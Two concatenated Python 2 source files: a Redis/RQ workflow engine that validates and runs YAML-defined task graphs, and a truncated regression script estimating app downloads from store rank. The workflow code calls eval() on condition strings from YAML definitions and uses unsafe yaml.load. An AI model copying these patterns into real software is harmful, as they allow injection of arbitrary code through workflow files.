def _set_work_start_time(wf, start_time):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(
wf.status_id, '_st', start_time.strftime('%Y-%m-%d %H:%M:%S')
)
wf.start_time = start_time
r.expire(wf.status_id, ONE_MONTH)
def _get_work_start_time(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
return datetime.datetime.strptime(
r.hget(wf.status_id, '_st'), '%Y-%m-%d %H:%M:%S')
def log(wf, info):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
log_content = r.hget(wf.status_id, '_log') or ''
t = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
log_content = log_content + '\n' + t + ' ' + info
r.hset(wf.status_id, '_log', log_content)
def _clear_status(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
all_keys = r.hgetall(wf.status_id)
for k in all_keys:
if not k.startswith('_') or k in ('_st', '_et', '_rt', '_log') or k.startswith('_lock_'):
r.hdel(wf.status_id, k)
def _clear_join_lock(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
all_keys = r.hgetall(wf.status_id)
for k in all_keys:
if k.startswith('_lock_'):
r.hdel(wf.status_id, k)
def _clear_this_join_lock(wf, task_name):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hdel(wf.status_id, '_lock_%s' % task_name)
def _get_exist_status_id(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
l = r.keys('*%s' % wf.id)
return None if not l else l[0]
def _set_running_flow_graph(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(
wf.status_id, '_graph', yaml.dump(wf.flow_graph)
)
r.hset(
wf.status_id, '_name', wf.flow_graph['name']
)
r.expire(wf.status_id, ONE_MONTH)
def _set_task_status(wf, task_name, status):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(wf.status_id, task_name, status)
def _set_task_running_time(wf, task_name, running_time):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(
wf.status_id, '%s_running_time' % task_name, running_time
)
def _get_task_status(wf, task_name):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
s = r.hget(wf.status_id, task_name)
return int(s) if s else s
def _get_work_status(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
s = r.hget(wf.status_id, '_s')
return int(s) if s else s
def _set_work_status(wf, status):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(wf.status_id, '_s', status)
r.expire(wf.status_id, ONE_MONTH)
def _set_work_running_time(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
end_time = datetime.datetime.now()
r.hset(
wf.status_id, '_et', end_time.strftime('%Y-%m-%d %H:%M:%S')
)
start_time = r.hget(wf.status_id, '_st')
start_time = datetime.datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')
running_time = str(end_time - start_time)
r.hset(wf.status_id, '_rt', running_time)
def _any_failed_tasks(wf, task_name):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
all_keys = r.hgetall(wf.status_id)
for k, v in all_keys.iteritems():
if not k.startswith('_') and not k.endswith('_running_time'):
tf = wf.flow_graph.get(k, {})
if int(v) == Status.FAILED and k != task_name and tf.get('node_type') != 'join':
return True
return False
def _all_tasks_success(wf, exclude_tasks=None):
for k, tf in wf.flow_graph.iteritems():
if isinstance(exclude_tasks, list) and k in exclude_tasks:
continue
if k.startswith('_') or k.endswith('_running_time') or k in WorkFlow.NON_NODE_NAMES or k == 'start':
continue
tf = wf.flow_graph.get(k, {})
if _get_task_status(wf, k) not in (Status.SUCCESS, Status.WONT_RUN) and tf.get('node_type') != 'join':
return False
return True
def _launch_multi_tasks(wf, next_task_list, current_task_status=Status.SUCCESS):
for task_name in next_task_list:
task_def = wf.flow_graph.get(task_name)
_launch_one_task(wf, task_name, task_def, current_task_status)
def _launch_one_task(wf, task_name, task_def, current_task_status=Status.SUCCESS):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf.rq_settings import QUEUES
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
if task_name == 'end':
if _any_failed_tasks(wf, 'end'):
_set_work_status(wf, Status.FAILED)
else:
_set_work_status(wf, Status.SUCCESS)
_set_work_running_time(wf)
log(
wf,
'End workflow: %s, id: %s' % (wf.flow_graph.get('name'), wf.id)
)
return
if not _any_failed_tasks(wf, task_name):
_set_work_status(wf, Status.RUNNING)
node_type = task_def['node_type']
queue = Queue(name=QUEUES[0], connection=r)
if node_type == 'task':
args = []
kwargs = {}
if isinstance(task_def.get('script_params', []), list):
args = task_def.get('script_params', [])
else:
kwargs = task_def.get('script_params', {})
alert_on_fail = task_def.get('alert_on_fail', False)
if current_task_status == Status.WONT_RUN:
_set_task_status(wf, task_name, Status.WONT_RUN)
queue.enqueue_call(queue_task, args=(
wf,
task_name, task_def.get('script_type'),
task_def.get('script_path'),
task_def.get('schedule_time', 'D'),
args, kwargs, True, alert_on_fail
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
elif node_type == 'join' and is_join_executable(wf, task_name):
queue.enqueue_call(queue_join, args=(
wf, task_name, task_def.get('wait')
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
elif node_type == 'workflow':
queue.enqueue_call(queue_workflow, args=(
wf, task_name, task_def,
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
def _launch_next_task(wf, current_task_name, current_task_status, task_output=None):
if current_task_status == Status.FAILED:
_set_work_status(wf, Status.FAILED)
_set_work_running_time(wf)
return
current_task_def = wf.flow_graph.get(current_task_name)
next_tasks = current_task_def.get('next')
if isinstance(next_tasks, list):
_launch_multi_tasks(wf, next_tasks, current_task_status)
elif isinstance(next_tasks, dict):
_true_condition = task_output if next_tasks.get(task_output) else 'default'
for _task_condition, _next_tasks in next_tasks.iteritems():
if _task_condition == _true_condition:
_task_status = Status.WONT_RUN if current_task_status == Status.WONT_RUN else Status.SUCCESS
else:
_task_status = Status.WONT_RUN
if isinstance(_next_tasks, list):
_launch_multi_tasks(wf, _next_tasks, _task_status)
else:
_next_task_def = wf.flow_graph.get(_next_tasks, {})
_launch_one_task(wf, _next_tasks, _next_task_def, _task_status)
else:
next_task_def = wf.flow_graph.get(next_tasks, {})
_launch_one_task(wf, next_tasks, next_task_def, current_task_status)
def _decide_schedule_time(wf, schedule_time):
running_time = _get_work_start_time(wf)
should_run = True
if schedule_time.startswith('W'):
week_day = schedule_time.split(':')[1]
if running_time.weekday() + 1 != int(week_day):
should_run = False
if schedule_time.startswith('M'):
month_day = schedule_time.split(':')[1]
if running_time.day != int(month_day):
should_run = False
return should_run
def _acquire_join_lock(wf, task_name):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
if r.hincrby(wf.status_id, '_lock_' + task_name) == 1:
return True
else:
return False
def _get_all_previous_nodes(wf, task_name, nodes=set()):
for node, node_def in wf.flow_graph.iteritems():
if node in WorkFlow.NON_NODE_NAMES:
continue
nexts = node_def.get('next', [])
if not isinstance(nexts, list):
nexts = [nexts]
for t in nexts:
if t == task_name:
nodes.add(node)
_get_all_previous_nodes(wf, node, nodes)
def _any_failed_waiting_tasks(wf, waiting_list):
for t in waiting_list:
if _get_task_status(wf, t) == Status.FAILED:
return True
nodes = set()
_get_all_previous_nodes(wf, t, nodes)
for pt in nodes:
if _get_task_status(wf, pt) == Status.FAILED:
return True
return False
def _any_running_waiting_tasks(wf, waiting_list):
for t in waiting_list:
nodes = set()
_get_all_previous_nodes(wf, t, nodes)
for pt in nodes:
if _get_task_status(wf, pt) == Status.RUNNING:
return True
return False
def valid_graph(flow_graph):
def find_not_pointed_node(graph):
for nn, ll in graph.iteritems():
if len(ll) == 0:
return nn
return None
is_succeed, msg, flow_graph = preload_graph(flow_graph)
if not is_succeed:
return False, msg, flow_graph
tmp_graph = {}
for node, node_def in flow_graph.iteritems():
if node in WorkFlow.NON_NODE_NAMES:
continue
if not isinstance(node_def, dict):
return False, 'Node %s definition should be a dict.' % node, flow_graph
if node != 'start' and 'node_type' not in node_def:
return False, 'Node %s has not node type.' % node, flow_graph
if not node_def.get('next'):
return False, 'Node %s has not next task(s).' % node, flow_graph
if node_def.get('node_type', 'start') not in WorkFlow.NODE_REQUIRED_PARAMS:
return False, 'Node %s: Unknown node type.' % node, flow_graph
for p in WorkFlow.NODE_REQUIRED_PARAMS[node_def.get('node_type', 'start')]:
if p not in node_def:
return False, 'Node %s miss key configuration.' % node, flow_graph
tmp_graph.setdefault(node, [])
next_list = []
if isinstance(node_def['next'], list):
next_list = node_def['next']
elif isinstance(node_def['next'], dict):
if node_def.get('node_type') != 'task':
return False, 'Node %s cannot use conditional next node, only task node can use.' % node, flow_graph
if 'default' not in node_def['next']:
return False, 'Node %s should have a "default" node in its next nodes dictionary.' % node, flow_graph
for _next_nodes in node_def['next'].values():
if isinstance(_next_nodes, list):
next_list.extend(_next_nodes)
else:
next_list.append(_next_nodes)
else:
if node_def['next'] != 'end':
next_list = [node_def['next']]
for n in next_list:
if n not in flow_graph:
return False, 'Unknown node: %s' % n, flow_graph
l = tmp_graph.setdefault(n, [])
l.append(node)
for n, l in tmp_graph.iteritems():
if len(l) > 1 and flow_graph[n].get('node_type') != 'join':
return False, '%s, Must use join to join multi tasks.' % n, flow_graph
while find_not_pointed_node(tmp_graph) is not None:
not_pointed_node = find_not_pointed_node(tmp_graph)
del tmp_graph[not_pointed_node]
for left_node in tmp_graph:
if not_pointed_node in tmp_graph[left_node]:
tmp_graph[left_node].remove(not_pointed_node)
if tmp_graph:
return False, 'Workflow graph exists loop.', flow_graph
return True, '', flow_graph
def preload_graph(flow_graph):
def _remove_null_wait_in_join_nodes(flow_graph):
for node in flow_graph:
node_def = flow_graph[node]
if isinstance(node_def, dict) and node_def.get('node_type') == 'join':
node_def['wait'] = [node for node in node_def['wait'] if node in flow_graph]
def _valid_decision_node(flow_graph, prev_node, node, node_def):
if 'switch' not in node_def or not isinstance(node_def.get('switch'), list):
return False, 'Decision node %s should have a list of cases in its "switch" field.' % node, None
has_default = False
next_nodes = None
for case in node_def.get('switch'):
if 'default' in case:
has_default = True
next_nodes = next_nodes or case.get('next')
if next_nodes is None:
return False, 'Decision node %s doesn\'t have next task(s) in its default condition.' % node, None
elif eval(case.get('case')):
next_nodes = next_nodes or case.get('next')
if next_nodes is None:
return False, 'Decision node %s doesn\'t have next task(s) in its case(s).' % node, None
if not has_default:
return False, 'Decision node %s doesn\'t have default condition.' % node, None
is_succeed, msg = _modify_join_nodes(flow_graph, prev_node, node, next_nodes)
if not is_succeed:
return is_succeed, msg, None
is_succeed, msg = _replace_decision_nodes(running_graph, node, next_nodes)
if not is_succeed:
return is_succeed, msg, None
return True, 'OK', next_nodes
def _modify_join_nodes(flow_graph, prev_node, node, next_nodes):
'''
replace the "wait" key if node type of next node is "join"
'''
if isinstance(next_nodes, list):
for _next_node in next_nodes:
if not _next_node in flow_graph:
return False, 'Unknown node: %s' % _next_node
_next_node_def = flow_graph[_next_node]
if _next_node_def.get('node_type') == 'join':
if node not in _next_node_def:
return False, 'Join node %s miss decision node %s in wait list.' % (_next_node, node)
if 'wait' not in _next_node_def:
return False, 'Node %s miss key configuration "wait".' % node
_next_node_def['wait'].remove(node)
_next_node_def['wait'].append(prev_node)
elif isinstance(next_nodes, dict):
return False, '"decision" node %s cannot use "conditional" next.' % node
else:
if not next_nodes in flow_graph:
return False, 'Unknown node: %s' % next_nodes
_next_node_def = flow_graph[next_nodes]
if _next_node_def.get('node_type') == 'join':
if node not in _next_node_def['wait']:
return False, 'Join node %s miss decision node %s in wait list.' % (next_nodes, node)
if 'wait' not in _next_node_def:
return False, 'Node %s miss key configuration "wait".' % node
_next_node_def['wait'].remove(node)
_next_node_def['wait'].append(prev_node)
return True, 'OK'
def _replace_decision_nodes(running_graph, node, next_nodes):
'''
replace "decision" nodes to their "next" nodes in the running_graph
'''
for running_node in running_graph:
running_node_def = running_graph[running_node]
if running_node in WorkFlow.NON_NODE_NAMES:
continue
running_next_nodes = running_node_def.get('next')
if node == running_next_nodes:
running_node_def['next'] = next_nodes
elif isinstance(running_next_nodes, list) and node in running_next_nodes:
running_next_nodes.remove(node)
if isinstance(next_nodes, list):
running_next_nodes.extend(next_nodes)
else:
running_next_nodes.append(next_nodes)
running_node_def['next'] = list(set(running_next_nodes))
return True, 'OK'
def _dequeue(running_nodes_queue):
return running_nodes_queue.get()
def _enqueue(running_nodes_queue, node, next_nodes):
if isinstance(next_nodes, list):
for _next_node in next_nodes:
running_nodes_queue.put((node, _next_node))
elif isinstance(next_nodes, dict):
for _next_nodes in next_nodes.values():
if isinstance(_next_nodes, list):
for _node in _next_nodes:
running_nodes_queue.put((node, _node))
else:
running_nodes_queue.put((node, _next_nodes))
elif next_nodes != 'end':
running_nodes_queue.put((node, next_nodes))
running_graph = {'name': flow_graph.get('name')}
running_nodes_queue = PriorityQueue()
running_nodes_queue.put((None, "start"))
while not running_nodes_queue.empty():
prev_node, node = _dequeue(running_nodes_queue)
node_def = flow_graph.get(node)
if node_def is None:
return False, 'Unknown node: %s' % node, None
if node_def.get('node_type') == 'decision':
is_succeed, msg, next_nodes = _valid_decision_node(flow_graph, prev_node, node, node_def)
if not is_succeed:
return is_succeed, msg, None
else:
running_graph[node] = node_def
next_nodes = node_def.get('next')
_enqueue(running_nodes_queue, node, next_nodes)
_remove_null_wait_in_join_nodes(running_graph)
return True, '', running_graph
def load_flow_graph(yaml_path, params):
yaml_content = open(yaml_path, 'r').read() % params
flow_graph = yaml.load(yaml_content)
return flow_graph
def _set_yaml_content(wf, yaml_content):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(wf.status_id, '_yaml_content', yaml_content)
r.expire(wf.status_id, ONE_MONTH)
def queue_task(wf, task_name, script_type, script_path, schedule_time, args, kwargs,
launch_next=True, alert_on_fail=False):
WorkFlow.task(wf, task_name, script_type, script_path, schedule_time, args, kwargs, launch_next, alert_on_fail)
def queue_join(wf, task_name, waiting_list):
WorkFlow.join(wf, task_name, waiting_list)
def queue_workflow(wf, task_name, task_def, launch_next=True):
WorkFlow.workflow(
wf, task_name, task_def.get('def_file'), task_def.get('async', True),
task_def.get('params', {}), launch_next
)
def is_join_executable(wf, task_name):
if _get_task_status(wf, task_name) == Status.RUNNING:
return False
if not _acquire_join_lock(wf, task_name):
return False
return True
class WorkFlow(object):
"""
Running a workflow.
- Use redis for sync task status.
- Each task finished then start next task.
- Support multi task launch.
- Support join primitive.
- Support sub-workflow.
"""
NON_NODE_NAMES = ('name', )
NODE_REQUIRED_PARAMS = {
'start': (),
'task': ('script_type', 'script_path', 'script_params'),
'join': ('wait', ),
'decision': ('switch', ),
'workflow': ('def_file', 'params')
}
flow_graph = {}
id = None
flow_status = Status.SUCCESS
status_id = None
def __init__(self, redis_host, redis_port, yaml_path=None, params={}, workflow_id=None):
self.redis_host = redis_host
self.redis_port = redis_port
if not workflow_id:
yaml_content = open(yaml_path, 'r').read()
self.flow_graph = yaml.load(yaml_content % params)
check_status, msg, self.flow_graph = valid_graph(self.flow_graph)
if not check_status:
raise Exception(msg)
self.id = str(uuid.uuid1())
self.status_id = 'workflow:%s:%s:%s' % (
datetime.date.today().strftime('%Y-%m-%d'),
slugify(self.flow_graph['name']),
self.id
)
_set_running_flow_graph(self)
else:
r = redis.Redis(host=self.redis_host, port=self.redis_port)
self.id = workflow_id
self.status_id = _get_exist_status_id(self)
if not self.status_id:
raise Exception('Workflow not exists')
self.flow_graph = yaml.load(r.hget(self.status_id, '_graph'))
yaml_content = r.hget(self.status_id, '_yaml_content')
if params:
self.flow_graph = yaml.load(yaml_content % params)
_set_running_flow_graph(self)
_set_yaml_content(self, yaml_content)
@staticmethod
def run_single_task(yaml_path, params, task_name):
flow_graph = load_flow_graph(yaml_path, params)
check_status, msg, flow_graph = valid_graph(flow_graph)
if not check_status:
raise Exception(msg)
if task_name not in flow_graph or flow_graph[task_name]['node_type'] != 'task':
return -1, 'Task not found or task type is invalid.'
task_def = flow_graph.get(task_name)
args = []
kwargs = {}
if isinstance(task_def.get('script_params', []), list):
args = task_def.get('script_params', [])
else:
kwargs = task_def.get('script_params', {})
script_type = task_def.get('script_type')
executor = Executor.get_executor(script_type)
script_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0], '../..',
task_def.get('script_path')
)
executor = executor(script_path, alert_on_fail=False, script_type=script_type)
return executor.run(*args, **kwargs)
@staticmethod
def rerun_one_task(redis_host, redis_port, workflow_id, task_name, launch_next=False):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf.rq_settings import QUEUES
r = redis.Redis(host=redis_host, port=redis_port)
queue = Queue(name=QUEUES[0], connection=r)
wf = WorkFlow(redis_host, redis_port, workflow_id=workflow_id)
if _get_task_status(wf, task_name) == Status.RUNNING:
return ErrorNumber.TASK_IS_RUNNING, 'Task %s is running now.' % task_name
if not _any_failed_tasks(wf, task_name):
_set_work_status(wf, Status.RUNNING)
task_def = wf.flow_graph.get(task_name)
_clear_join_lock(wf)
node_type = task_def['node_type']
if node_type == 'task':
args = []
kwargs = {}
if isinstance(task_def.get('script_params', []), list):
args = task_def.get('script_params', [])
else:
kwargs = task_def.get('script_params', {})
alert_on_fail = task_def.get('alert_on_fail', False)
queue.enqueue_call(queue_task, args=(
wf,
task_name, task_def.get('script_type'),
task_def.get('script_path'),
task_def.get('schedule_time', 'D'),
args, kwargs, launch_next, alert_on_fail
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
elif node_type == 'join' and is_join_executable(wf, task_name):
queue.enqueue_call(queue_join, args=(
wf, task_name, task_def.get('wait')
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
elif node_type == 'workflow':
queue.enqueue_call(queue_workflow, args=(
wf, task_name, task_def, launch_next
), kwargs={}, timeout=ONE_MONTH, result_ttl=500)
@staticmethod
def rerun_workflow(redis_host, redis_port, workflow_id, params={}):
wf = WorkFlow(redis_host, redis_port, params=params, workflow_id=workflow_id)
if _get_work_status(wf) == Status.RUNNING:
return ErrorNumber.WORKFLOW_IS_RUNNING, 'Workflow is running now.'
WorkFlow.start(wf)
@staticmethod
def task(wf, task_name, script_type, script_path, schedule_time, args, kwargs,
launch_next=True, alert_on_fail=False):
if _get_task_status(wf, task_name) == Status.RUNNING:
return
if _get_task_status(wf, task_name) == Status.WONT_RUN:
if launch_next:
_launch_next_task(wf, task_name, Status.WONT_RUN)
elif _all_tasks_success(wf):
_set_work_status(wf, Status.SUCCESS)
return
this_status = Status.RUNNING
_set_task_status(wf, task_name, this_status)
this_status = Status.SUCCESS
if not _decide_schedule_time(wf, schedule_time):
_set_task_status(wf, task_name, this_status)
log(wf, 'Task(%s) is not on schedule date, skip.' % task_name)
_launch_next_task(wf, task_name, this_status)
return
start_time = datetime.datetime.now()
try:
log(wf, 'Running task: %s' % task_name)
executor = Executor.get_executor(script_type)
script_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0], '../..', script_path
)
executor = executor(script_path, alert_on_fail=alert_on_fail, script_type=script_type)
status, output = executor.run(*args, **kwargs)
except:
status = ErrorNumber.RUNNING_ERROR
output = traceback.format_exc()
end_time = datetime.datetime.now()
running_time = str(end_time - start_time)
if status != 0:
log(wf, output)
this_status = Status.FAILED
if launch_next:
_launch_next_task(wf, task_name, this_status, output)
elif _all_tasks_success(wf, [task_name]) and this_status == Status.SUCCESS:
_set_work_status(wf, Status.SUCCESS)
_set_task_status(wf, task_name, this_status)
_set_task_running_time(wf, task_name, running_time)
log(
wf,
'End task: %s, status: %s' % (task_name, STATUS_LABEL[this_status])
)
@staticmethod
def join(wf, task_name, waiting_list):
_set_task_status(wf, task_name, Status.RUNNING)
while True:
if _any_failed_waiting_tasks(wf, waiting_list):
_set_task_status(wf, task_name, Status.SUCCESS)
_clear_this_join_lock(wf, task_name)
return
all_status = map(lambda x: _get_task_status(wf, x), waiting_list)
if None in all_status:
time.sleep(10)
continue
# SUCCESS = 0b001, RUNNING = 0b010, WONT_RUN = 0b100
union_status = reduce(lambda x, y: x | y, all_status)
if union_status & Status.RUNNING == Status.RUNNING:
time.sleep(10)
else:
_launch_next_task(wf, task_name, union_status & Status.SUCCESS or union_status & Status.WONT_RUN)
_set_task_status(wf, task_name, Status.SUCCESS)
_clear_this_join_lock(wf, task_name)
break
@staticmethod
def workflow(wf, task_name, def_file, async, params, launch_next=True):
if _get_task_status(wf, task_name) == Status.RUNNING:
return
this_status = Status.RUNNING
_set_task_status(wf, task_name, this_status)
this_status = Status.SUCCESS
start_time = datetime.datetime.now()
log(wf, 'Running task: %s' % task_name)
yaml_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0], '../definitions', def_file
)
try:
wf_t = WorkFlow(wf.redis_host, wf.redis_port, yaml_path=yaml_path, params=params)
WorkFlow.start(wf_t)
if async:
this_status = Status.SUCCESS
else:
this_status = _get_work_status(wf_t)
while this_status is None or this_status == Status.RUNNING:
time.sleep(10)
this_status = _get_work_status(wf_t)
except:
this_status = Status.FAILED
output = traceback.format_exc()
log(wf, output)
end_time = datetime.datetime.now()
running_time = str(end_time - start_time)
if launch_next:
_launch_next_task(wf, task_name, this_status)
_set_task_status(wf, task_name, this_status)
_set_task_running_time(wf, task_name, running_time)
log(
wf,
'End task: %s, status: %s' % (task_name, STATUS_LABEL[this_status])
)
@staticmethod
def start(wf):
start_time = datetime.datetime.now()
_clear_status(wf)
log(
wf,
'Start workflow: %s, id: %s' % (wf.flow_graph.get('name'), wf.id)
)
_set_work_status(wf, Status.RUNNING)
_set_work_start_time(wf, start_time)
_set_task_status(wf, 'start', Status.SUCCESS)
_launch_next_task(wf, 'start', Status.SUCCESS)
<file_sep>/betty_benchmark_android/model_apv2.py
##
# model python version 2
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: Betty, fixed 14d training time, OLS
#
##
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
import os
import config
#import operator
#import math
import csv
#import statsmodels.formula.api as sm
import statsmodels.regression.linear_model as sm
#import statsmodels.api as sm
#from sklearn.svm import SVR
import numpy as np
#from rpy import *
import datetime as dt
from sklearn.cross_validation import KFold
#from sklearn.cross_validation import StratifiedKFold
import bz2
result = None
gres = []
feed_market_format = { 0: 'Free',
1: 'Paid',
2: 'Grossing',
}
def fun(x):
if np.isnan(x):
return 0
else:
return 1/pow(float(x),2 )
def wavg(group):
d = group['t1e']
w = group['nb_obs']
return (d * w).sum() / w.sum()
def preprocess_metadata(df):
df['est'] = df['est'].fillna(0)
#df['ipad_estimate'] = df['ipad_estimate'].fillna(0)
df['actual_log']=np.log(df['actual'])
df['Daily.Estimate']=df['est']
del df['est']
df['r_log']=np.log(df['rank']+1.0)
df['r_inv']=1.0/df['rank']
df['weekday'] = df['date'].apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%d').weekday())
df['isMon'] = 0
df['isTue'] = 0
df['isWed'] = 0
df['isThu'] = 0
df['isFri'] = 0
df['isSat'] = 0
df['isSun'] = 0
df['isMon'][(df['weekday'] == 0)] = 1
df['isTue'][(df['weekday'] == 1)] = 1
df['isWed'][(df['weekday'] == 2)] = 1
df['isThu'][(df['weekday'] == 3)] = 1
df['isFri'][(df['weekday'] == 4)] = 1
df['isSat'][(df['weekday'] == 5)] = 1
df['isSun'][(df['weekday'] == 6)] = 1
#df['wt_rank_iphone'] = 0.01
#df['wt_rank_ipad'] = 0.01
#df['wt_rank_iphone'][df['iphone_rank'] <= 20] = 1
#df['wt_rank_ipad'][df['ipad_rank'] <= 20] = 1
#df['wt_rank_iphone'] = 1.0/df['iphone_rank']
#df['wt_rank_ipad'] = 1.0/df['ipad_rank']
#df['wt_rank_iphone'] = df['wt_rank_iphone'].fillna(0)
#df['wt_rank_ipad'] = df['wt_rank_ipad'].fillna(0)
#df['wt_rank'] = df['wt_rank_iphone'] + df['wt_rank_ipad']
#df['wt_perc'] = 1.0 / df['actual']
#del df['wt_rank_iphone']
#del df['wt_rank_ipad']
df = df.drop_duplicates()
return df
def regression(df, fdate, ldate):
startdate = fdate
enddate = ldate
gres = []
#app_ids = []
for n, g in df.groupby(['category_id', 'feed_id']):
dates = g['date'].drop_duplicates()
for date in dates:
if (date > enddate) or (date < startdate):
continue
print n, date
df_obs_7d = g[(g['date'] <= date) & (g['date'] >= (dt.datetime.strptime(date, '%Y-%m-%d').date() - dt.timedelta(days=7)).isoformat() )]
df_obs_14d = g[(g['date'] <= date) & (g['date'] >= (dt.datetime.strptime(date, '%Y-%m-%d').date() - dt.timedelta(days=14)).isoformat() )]
#print('universal')
#traina = df_obs_7d[((np.isnan(df_obs_7d['r_log']) == False) & (np.isnan(df_obs_7d['actual_log']) == False) & (np.isnan(df_obs_7d['has_event_flag']) == True))]
#df_obs = df_obs_7d[((np.isnan(df_obs_7d['r_log']) == False))]
#trainday = 7
#if ( len(traina) < 100):
traina = df_obs_14d[((np.isnan(df_obs_14d['r_log']) == False) & (np.isnan(df_obs_14d['actual_log']) == False) & (np.isnan(df_obs_14d['has_event_flag']) == True))]
df_obs = df_obs_14d[((np.isnan(df_obs_14d['r_log']) == False))]
trainday = 14
test_outa = []
if ( len(traina) > 20):
app_ids = df_obs[['app_id']].drop_duplicates().reset_index()
del app_ids['index']
traina = traina.reset_index()
kf = KFold(len(app_ids), n_folds=5, indices=True, shuffle=True)
for tr, te in kf:
train = traina[traina['app_id'].isin(app_ids.loc[tr]['app_id'])]
test = df_obs[df_obs['app_id'].isin(app_ids.loc[te]['app_id'])]
#train = df_obs.loc[tr]
#test = df_obs.loc[te]
#traina = train[((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual_log']) == False) & (np.isnan(train['has_event_flag']) == True))]
test = test[(np.isnan(test['r_log']) == False) & (test['date'] == date)]
try:
model_ra = (sm.OLS.from_formula(formula ='actual_log ~ r_log + r_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun',
data = train))
fitted_ra = model_ra.fit()
test['tae'] = np.exp(fitted_ra.predict(test[['r_log', 'r_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
#train['tae'] = np.exp(fitted_ra.predict(train[['r_log', 'r_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
#train['score'] = 1.0 / (abs((train['tae'] / train['actual']) - 1.0) * train['rank'] + 1.0)
#test['cg_score'] = train['score'].sum(1)
test['train_day'] = trainday
except:
test['tae'] = float(np.nan)
#test['cg_score'] = float(np.nan)
test['train_day'] = trainday
test_outa.append(test)
test_outa = pd.concat(test_outa)
else:
test_outa = df_obs[df_obs['date'] == date]
test_outa['tae'] = float(np.nan)
test_outa['cg_score'] = float(np.nan)
test_outa['train_day'] = float(np.nan)
#print test_out1.columns
test_outa = test_outa[['app_id', 'category_id', 'date', 'feed_id', 'tae', 'train_day']]
result = g[g['date'] == date]
#result['nb_obs'] = df_obs['actual'].dropna().shape[0]
result = result.merge(test_outa, on=['app_id', 'category_id', 'date', 'feed_id'], how='left')
gres.append(result)
if (gres == []):
return pd.DataFrame()
gres = pd.concat(gres)
#gres['tae'] = gres['tae'].where(np.isnan(gres['tae']) == False, gres['t1e'])
#gres['tae'] = gres['tae'].where(np.isnan(gres['tae']) == False, gres['t2e'])
#gres['cg_score'] = gres['cg_score'].where(np.isnan(gres['cg_score']) == False, gres['cg_score_x'])
#gres['cg_score'] = gres['cg_score'].where(np.isnan(gres['cg_score']) == False, gres['cg_score_y'])
#gres['train_day'] = gres['train_day'].where(np.isnan(gres['train_day']) == False, gres['train_day_x'])
#gres['train_day'] = gres['train_day'].where(np.isnan(gres['train_day']) == False, gres['train_day_y'])
#del gres['t1e']
#del gres['cg_score_x']
#del gres['train_day_x']
#del gres['t2e']
#del gres['cg_score_y']
#del gres['train_day_y']
#print gres.dtypes()
gres.to_csv('res_stg_%s_%s_%s.csv'%(store_id, store_name, ver), index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres
def gene_final(df):
gres_final = df.groupby(['store_id', 'date', 'app_id', 'feed_id']).mean().reset_index()
gres_final['sbe_rel_error'] = (gres_final['Daily.Estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
#gres_final['t12e_rel_error'] = (gres_final['t1e+t2e'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final.to_csv('res%s%s.csv'%(store_id,ver), index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres_final
def gene_final_byscore(df):
#actuals_df = df[['store_id', 'date', 'feed_id', 'app_id', 'actual']].drop_duplicates()
gres_final = df.groupby(['store_id', 'date', 'app_id', 'feed_id']).mean().reset_index()
df['loginv_abs_error'] = (df['tae'] - df['actual']).abs()
df['loginv_rel_error'] = df['loginv_abs_error'] / df['actual']
df['score'] = 0.0
df['score'] = 1.0 / ((df['rank'] * df['loginv_rel_error']) + 1.0)
#df['score'][np.isnan(df['ipad_rank'])==False] = 1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)
#df['score'][(np.isnan(df['iphone_rank'])==False) &
# (np.isnan(df['ipad_rank'])==False)] = ((1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)) + (1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)))/2.0
scores = df.groupby(['store_id', 'feed_id', 'category_id', 'date']).sum().reset_index()
scores = scores[['store_id', 'feed_id', 'category_id', 'date', 'score']]
scores.rename(columns={'score':'cg_score'}, inplace=True)
del df['score']
#loginv_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).mean().reset_index()
